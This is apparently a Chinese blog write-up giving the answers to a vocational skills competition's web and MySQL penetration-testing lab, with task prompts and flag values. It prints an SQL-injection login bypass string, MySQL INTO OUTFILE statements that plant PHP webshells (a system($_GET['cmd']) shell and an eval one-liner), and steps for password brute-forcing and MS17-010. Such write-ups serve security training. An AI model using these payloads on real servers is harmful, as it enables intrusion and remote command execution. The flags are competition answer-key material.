全国职业院校技能大赛网络安全之web;mysql安全之综合渗透测试

**

最近新建了一个比赛讨论群,有意的可以进一下,扣扣群号为809706080

**

  1. 通过URL访问http://靶机IP/1,对该页面进行渗透测试,将完成后返回的结果内容作为Flag值提交;
    在这里插入图片描述flag{htmlcode}

  2. 通过URL访问http://靶机IP/2,对该页面进行渗透测试,将完成后返回的结果内容作为Flag值提交; 在这里插入图片描述
    flag{vimbakswp}

  3. 通过URL访问http://靶机IP/3,对该页面进行渗透测试,将完成后返回的结果内容作为Flag值提交;
    在这里插入图片描述
    flag{spider}

4.通过URL访问http://靶机IP/4,对该页面进行渗透测试,将完成后返回的结果内容作为Flag值提交;
在这里插入图片描述
flag{sqlinject1}

5通过URL访问http://靶机IP/5,对该页面进行渗透测试,将完成后返回的结果内容作为Flag值提交;
用户名 admin 密码 ‘or’1’=’1
在这里插入图片描述
flag{wannengpwd}

  1. 通过URL访问http://靶机IP/6,对该页面进行渗透测试,将完成后返回的结果内容作为Flag值提交;

在这里插入图片描述
flag{ipsrc}

MYSQL安全之综合渗透测试
1.利用渗透机场景kali中的工具确定MySQL的端口,将MySQL端口作为Flag值提交;
Flag:3358
在这里插入图片描述

2.管理者曾在web界面登陆数据库,并执行了select ‘<?php echo \'

\';system($_GET[\'cmd\']); echo \'
\'; ?>’ INTO OUTFILE 'C:/phpstudy/test1.php’语句,结合本执行语句使用dos命令查看服务器的详细配置信息,并将服务器的系统型号作为Flag值提交;

Flag:Bochs
在这里插入图片描述

Ms17-010
在这里插入图片描述

3.利用渗透机场景kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码,并将破解MySQL的密码所需的模块当作Flag值 (账户为root) 提交;
Flag:mysql_login
在这里插入图片描述

4.利用渗透机场景kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码,并将MySQL的密码当作Flag值 (账户为root) 提交;
Flag:zxcvbnm
在这里插入图片描述

5.利用上题中的数据库账户密码在登陆数据库,通过select ‘<?php @eval($_POST[admin]);?>’************ 'C:/phpstudy/shell.php’语句向服务器提交名为shell.php的一句话木马,将语句中*号的明文作为Flag值(*为大写字母或者空格)提交;
Flag:INTO OUTFILE
可以参考第二小题
在这里插入图片描述

6.使用菜刀连接上题中的shell.php,下载服务器根目录下的压缩包,将压缩包中的Flag值提交。
Flag:huaixiaohai
还是ms17-010,把压缩包下载到本地
在这里插入图片描述

根据提示密码时数字
在这里插入图片描述

爆破密码
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

  • 29
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Battle me

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值